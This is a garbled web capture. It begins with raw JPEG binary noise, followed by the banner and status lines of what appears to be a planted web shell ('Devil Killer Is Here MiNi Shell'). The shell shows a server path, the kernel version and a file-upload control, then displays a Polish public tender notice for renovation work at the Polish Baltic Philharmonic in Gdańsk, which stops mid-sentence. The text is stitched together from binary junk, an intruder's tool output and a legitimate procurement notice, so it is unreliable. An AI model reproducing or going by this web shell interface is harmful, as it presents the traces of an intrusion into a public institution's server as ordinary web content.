JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0062905701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prace remontowe i modernizacje na rzecz PFB. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLSKA FILHARMONIA BAŁTYCKA IM.FRYDERYKA CHOPINA W GDAŃSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190317940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ołowianka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-751</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pfb.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://filharmonia.gda.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace remontowe i modernizacje na rzecz PFB. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7e4f78ff-f811-4f45-83fd-6ed237bc8fbd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00629057</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00050798/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Prace remontowe i modernizacje na rzecz PFB.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://filharmonia-gda.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Informacje o środkach komunikacji elektronicznej:<br/>1.	W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej.<br/>2.	Pytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez link: https://filharmonia-gda.ezamawiajacy.pl. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem.<br/>3.	Oferta wraz z załącznikami musi być złożona w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, profilem zaufanym lub dowodem osobistym <br/>w systemie informatycznym dostępnym pod adresem https://filharmonia-gda.ezamawiajacy.pl. <br/>4.	Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego, opisane zostały w Instrukcji, dla wykonawców która jest udostępniana na platformie zakupowej zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Rozdziałem 9 SWZ:<br/>I. Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>1. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: 1) Akceptuje warunki korzystania z<br/>Platformy zakupowej określone w Regulaminie zamieszczonym pod adresem: https://oneplace.marketplanet.pl/regulamin<br/>2) Zapoznał i stosuje się do Instrukcji składania ofert dostępnej pod adresem:<br/>https://filharmoniagda.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_action=publicFilesList&amp;folder=000t&amp;clientName=filharmoniagda&amp;MP_module=main<br/>2. Ogólne zasady korzystania z Platformy zakupowej opisane w SWZ, w Rozdziale 9, ustęp III, punkt 2 i dalsze.<br/>II. Informacje dotyczące wymagań technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji<br/>elektronicznej:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje (aktualny system operacyjny wspierany przez<br/>producenta);<br/>3) zainstalowana dowolna przeglądarka internetowa wspierana przez producenta (MS Internet Explorer, FireFox, Google Chrome lub<br/>MS Edge) obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie *.pdf.<br/>III. Zamawiający podaje dane dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu<br/>przekazania i odbioru danych:<br/>1) plik załączony przez Wykonawcę na Platformie zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>otwarcia ofert<br/>2) oznaczenie czasu odbioru danych przez Platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego odpowiednim źródłem czasu.<br/>IV. Zalecenia zamawiającego:<br/>1) Dotyczące kwalifikowanego podpisu elektronicznego:<br/>a) dokumenty w formacie *.pdf zaleca się podpisywać formatem *.PAdES<br/>b) dopuszcza się podpisanie dokumentów w formacie innym niż *.pdf, wówczas będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.<br/>2) Formatu przesyłanej korespondencji: dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w *.txt, *.rtf,<br/>*.pdf, *.xps, *.odt, *.ods, *.odp, *.doc, *.xls, *.ppt, *.docx, *.xlsx, *.pptx, *.csv, *.jpg, *.jpeg, *.tif, *.tiff, *.geotiff, *.png, *.svg, *.wav,<br/>*.mp3, *.avi, *.mpg, *.mpeg, *.mp4, *.m4a, *.mpeg4, *.ogg, *.ogv, *.zip, *.rar, *.tar, *.gz, *.gzip, *.7z, *.html, *.xhtml, *.css, *.xml,<br/>*.xsd,*.gml, *.rng, *.xsl, *.xslt, *.TSL, *.XMLsig, *.XAdES, *.CAdES, *.ASIC, *.XMLenc.<br/>V. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy zakupowej,<br/>Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Polskiej Filharmonii<br/>Bałtyckiej, tel. +48 22 257-22-23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00), e-mail: oneplace@marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13, ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektory 95/46/WE (ogólne rozporządzenie o ochronie danych);</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DTE.271.444.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 372893,43 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – remont posadzki w Sali Zielonej wraz z płaszczyznami pionowymi przy scenie. Szczegółowy opis przedmiotu zamówienia znajduje się w:<br/>1)	załączniku nr 2 do niniejszej SWZ (opis przedmiotu zamówienia),<br/>2)	załączniku 3 do niniejszej SWZ (dokumentacji dla zadania nr 1), <br/>3)	załączniku nr 5A do niniejszej SWZ – Wzorze umowy dla zadania nr 1. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 45815,62 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45432114-6 - Roboty w zakresie podłóg drewnianych</p> <p class="mb-0">98395000-8 - Usługi ślusarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-02-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena ofert odbędzie się na podstawie ilości przyznanych punktów. Za najkorzystniejszą uważa się ofertę z największą ilością punktów. Maksymalna możliwa ilość – 100 pkt. <br/>2.	Każda z części postępowania będzie oceniana w ten sam sposób: oferty będą oceniane dla każdej części osobno, ale na podstawie kryteriów wskazanych w niniejszym rozdziale.<br/>3.	Wszystkie oferty niepodlegające odrzuceniu, oceniane będą na podstawie następujących dwóch kryteriów: <br/>1)	Cena oferty brutto – 60%, <br/>2)	Doświadczenie wykonawcy – 40%.<br/>4.	Sposób oceny ofert w kryterium 1 o wadze 60 pkt – Cena oferty<br/>W powyższym kryterium oceniana będzie cena brutto dla każdej części osobno, zawierająca całkowity koszt wykonania prac niezbędnymi zasobami. Maksymalną ilość punktów ilość punktów – 60 punktów – otrzyma Wykonawca, który zaproponuje najniższą cenę brutto, pozostali będą oceniani wg wzoru:<br/>KC = [(CN / CR) x 60%] x 100, przy czym:<br/>•	KC – suma punktów w kryterium ceny; <br/>•	CN – najniższa oferowana cena brutto spośród badanych ofert;<br/>•	CR – cena brutto oferty badanej. <br/>Punktacja będzie obliczana z dokładnością do dwóch miejsc po przecinku. <br/><br/>5.	Sposób oceny ofert w kryterium 2 – Doświadczenie Wykonawcy<br/>W powyższym kryterium oceniane będzie doświadczenie Wykonawcy poprzez zrealizowane przez roboty budowlane na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320). Maksymalna ilość punktów w tym kryterium to 40. Punkty przyznawane będą wszystkim wykonawcom w ten sam sposób, według poniżej określonych zasad, dla każdej części osobno:<br/><br/>1)	Dla części nr 1 – remont posadzki w Sali Zielonej wraz z płaszczyznami pionowymi przy scenie.<br/>Minimalna liczba robót budowlanych na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320) wynosi 1 – o wartości 50 tysięcy złotych brutto. Za każdą kolejną robotę o wartości min. 20.000,00 zł brutto oferta otrzyma dodatkowe 10 punktów, w ten sposób, że:<br/>•	1 robota z wymagania minimalnego na kwotę min. 50.000,00 zł brutto -&gt; 0 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 50.000,00 zł brutto PLUS 1 robota dodatkowa na kwotę min. 20.000,00 zł brutto -&gt; 10 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 50.000,00 zł brutto PLUS 2 roboty dodatkowe na kwotę min. 20.000,00 zł brutto każda -&gt; 20 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 50.000,00 zł brutto PLUS 3 roboty dodatkowe na kwotę min. 20.000,00 zł brutto każda -&gt; 30 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 50.000,00 zł brutto PLUS 4 roboty dodatkowe na kwotę min. 20.000,00 zł brutto każda -&gt; 40 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – remont konstrukcji pn. „Biały żagiel”. Szczegółowy opis zakresu prac znajduje się w:<br/>1)	załączniku nr 4 do niniejszej SWZ (dokumentacji projektowej dla zadania nr 2), <br/>4)	załączniku nr 5B do niniejszej SWZ – Wzorze umowy dla zadania nr 2. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 327077,81 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-05-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena ofert odbędzie się na podstawie ilości przyznanych punktów. Za najkorzystniejszą uważa się ofertę z największą ilością punktów. Maksymalna możliwa ilość – 100 pkt. <br/>2.	Każda z części postępowania będzie oceniana w ten sam sposób: oferty będą oceniane dla każdej części osobno, ale na podstawie kryteriów wskazanych w niniejszym rozdziale.<br/>3.	Wszystkie oferty niepodlegające odrzuceniu, oceniane będą na podstawie następujących dwóch kryteriów: <br/>1)	Cena oferty brutto – 60%, <br/>2)	Doświadczenie wykonawcy – 40%.<br/>4.	Sposób oceny ofert w kryterium 1 o wadze 60 pkt – Cena oferty<br/>W powyższym kryterium oceniana będzie cena brutto dla każdej części osobno, zawierająca całkowity koszt wykonania prac niezbędnymi zasobami. Maksymalną ilość punktów ilość punktów – 60 punktów – otrzyma Wykonawca, który zaproponuje najniższą cenę brutto, pozostali będą oceniani wg wzoru:<br/>KC = [(CN / CR) x 60%] x 100, przy czym:<br/>•	KC – suma punktów w kryterium ceny; <br/>•	CN – najniższa oferowana cena brutto spośród badanych ofert;<br/>•	CR – cena brutto oferty badanej. <br/>Punktacja będzie obliczana z dokładnością do dwóch miejsc po przecinku. <br/><br/>5.	Sposób oceny ofert w kryterium 2 – Doświadczenie Wykonawcy<br/>W powyższym kryterium oceniane będzie doświadczenie Wykonawcy poprzez zrealizowane przez roboty budowlane na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320). Maksymalna ilość punktów w tym kryterium to 40. Punkty przyznawane będą wszystkim wykonawcom w ten sam sposób, według poniżej określonych zasad, dla każdej części osobno:<br/><br/>1)	Dla części nr 2 – remont konstrukcji pn. „Biały żagiel”<br/>Dla tej części minimalna liczba robót na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320) wynosi 1 – o wartości 300 000 zł brutto. Za każdą kolejną robotę o wartości min. 70.000,00 zł brutto oferta otrzyma dodatkowe 10 punktów, w ten sposób, że:<br/>•	1 robota z wymagania minimalnego na kwotę min. 300.000,00 zł brutto -&gt; 0 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 300.000,00 zł brutto PLUS 1 robota dodatkowa na kwotę min. 70.000,00 zł brutto -&gt; 10 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 300.000,00 zł brutto PLUS 2 roboty dodatkowe na kwotę min. 70.000,00 zł brutto każda -&gt; 20 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 300.000,00 zł brutto PLUS 3 roboty dodatkowe na kwotę min. 70.000,00 zł brutto każda -&gt; 30 punktów<br/>•	1 robota z wymagania minimalnego na kwotę min. 300.000,00 zł brutto PLUS 4 roboty dodatkowe na kwotę min. 70.000,00 zł brutto każda -&gt; 40 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają minimalne warunki udziału w postępowaniu określone przez Zamawiającego dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej: zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż:<br/>a)	50 000,00 PLN dla części zamówienia nr 1. 